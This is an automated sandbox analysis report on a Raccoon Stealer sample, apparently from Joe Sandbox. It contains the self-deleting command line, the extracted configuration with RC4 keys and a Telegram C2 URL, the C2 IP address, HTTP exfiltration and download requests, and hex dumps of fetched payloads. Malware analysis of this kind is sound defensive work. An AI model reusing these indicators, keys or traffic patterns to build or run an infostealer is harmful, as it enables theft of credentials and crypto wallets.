Play interactive tour

Edit tour

Windows Analysis Report Aqlmlmmeey.exe

Overview

General Information

Sample Name:	Aqlmlmmeey.exe
Analysis ID:	491928
MD5:	c1258ce5cdc59be3cf83f8de7a42e899
SHA1:	7097454adeef597a9f06839b68be559827d1ed42
SHA256:	51883d0e9ac65bb1850ce0f0a668df2a03e16bb9500be5a6ca54f8ff02154506
Tags:	exeRaccoonStealer
Infos:
Most interesting Screenshot:

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Machine Learning detection for sample

Self deletion via cmd delete

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Aqlmlmmeey.exe (PID: 5164 cmdline: 'C:\Users\user\Desktop\Aqlmlmmeey.exe' MD5: C1258CE5CDC59BE3CF83F8DE7A42E899)

cmd.exe (PID: 1700 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\Aqlmlmmeey.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 3528 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.271763487.00000000030C0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000000.00000003.250736320.0000000003150000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: Aqlmlmmeey.exe PID: 5164	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.Aqlmlmmeey.exe.30c0e50.1.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.Aqlmlmmeey.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.3.Aqlmlmmeey.exe.3150000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.3.Aqlmlmmeey.exe.3150000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.Aqlmlmmeey.exe.30c0e50.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.Aqlmlmmeey.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.Aqlmlmmeey.exe.400000.0.unpack

Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Multi AV Scanner detection for submitted file

Show sources

Source: Aqlmlmmeey.exe	Virustotal: Detection: 48%			Perma Link
Source: Aqlmlmmeey.exe	ReversingLabs: Detection: 40%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.271763487.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250736320.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Aqlmlmmeey.exe PID: 5164, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: Aqlmlmmeey.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	0_2_0042A130
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,	0_2_0040E139
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,	0_2_0040CF54
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	0_2_0040F2E6
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,	0_2_0040D684
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	0_2_00429F5D

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Unpacked PE file: 0.2.Aqlmlmmeey.exe.400000.0.unpack

Source: Aqlmlmmeey.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49730 version: TLS 1.2

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Aqlmlmmeey.exe, 00000000.00000003.269713467.00000000054BC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Aqlmlmmeey.exe, 00000000.00000002.273689081.000000006F429000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: v{ UC:\garehiyotino_100\cayucis_dezoxo.pdb source: Aqlmlmmeey.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Aqlmlmmeey.exe, 00000000.00000002.273689081.000000006F429000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: C:\garehiyotino_100\cayucis_dezoxo.pdb source: Aqlmlmmeey.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_0043EFDD

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49731 -> 185.138.164.150:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49731 -> 185.138.164.150:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://t.me/agrybirdsgamerept

Source: Joe Sandbox View

ASN Name: DEPTELECOMNSO-ASRU DEPTELECOMNSO-ASRU

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/GpHpKnwB3dP17SpzaKnS/9801dace6a5ab5b92aa19fd0ea4e73710d7a6a98 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1404Host: 185.138.164.150

Source: Joe Sandbox View	IP Address: 185.138.164.150 185.138.164.150
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 05:38:32 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 05:38:37 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 